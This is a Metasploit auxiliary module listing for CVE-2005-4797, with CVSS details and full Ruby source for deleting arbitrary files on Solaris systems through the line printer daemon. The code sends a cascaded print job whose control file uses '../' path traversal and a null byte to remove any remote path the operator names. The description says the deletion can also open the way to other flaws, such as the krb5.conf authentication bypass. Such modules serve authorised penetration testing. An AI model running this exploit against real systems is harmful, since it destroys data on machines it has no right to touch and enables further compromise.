Solaris LPD Arbitrary File Delete

2006-09-1800:33:16

hdm <[email protected]>, Optyx <[email protected]>

www.rapid7.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

JSON

This module uses a vulnerability in the Solaris line printer daemon to delete arbitrary files on an affected system. This can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris LPD Arbitrary File Delete',
      'Description'    => %q{
        This module uses a vulnerability in the Solaris line printer
        daemon to delete arbitrary files on an affected system. This
        can be used to exploit the rpc.walld format string flaw, the
        missing krb5.conf authentication bypass, or simply delete
        system files. Tested on Solaris 2.6, 7, 8, 9, and 10.

      },
      'Author'         => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-4797' ],
          [ 'BID', '14510' ],
          [ 'OSVDB', '18650' ]
        ]
      ))

      register_options(
        [
          Opt::RPORT(515),
          OptString.new('RPATH', [ true, "The remote file path to delete"]),
        ])
  end

  def run


    r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
    r_user     = Rex::Text.rand_text_alpha(rand(8)+1)
    r_spool    = Rex::Text.rand_text_alpha(rand(8)+1)

    # Create a simple control file...
    control = "H#{r_hostname}\nP#{r_user}\n";

    # The job ID is squashed down to three decimal digits
    jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Establish the first connection to the server
    sock1 = connect(false)

    # Request a cascaded job
    sock1.put("\x02#{r_hostname}:#{r_spool}\n")
    res = sock1.get_once
    if (not res)
      print_status("The target did not accept our job request command")
      return
    end

    # Theoretically, we could delete multiple files at once, however
    # the lp daemon will append garbage from memory to the path name
    # if we don't stick a null byte after the path. Unfortunately, this
    # null byte will prevent the parser from processing the other paths.
    control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"

    dataf = Rex::Text.rand_text_alpha(100)+1

    print_status("Deleting #{datastore['RPATH']}...")
    if !(
        send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
        send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)
      )
      sock1.close
      return
    end

    print_good("Successfully deleted #{datastore['RPATH']} >:-]")
    sock1.close
  end

  def send_file(s, type, name, data='')

    s.put(type.chr + data.length.to_s + " " + name + "\n")
    res = s.get_once(1)
    if !(res and res[0] == ?\0)
      print_status("The target did not accept our control file command (#{name})")
      return
    end

    s.put(data)
    s.put("\x00")
    res = s.get_once(1)
    if !(res and res[0] == ?\0)
      print_status("The target did not accept our control file data (#{name})")
      return
    end

    print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
    return true
  end
end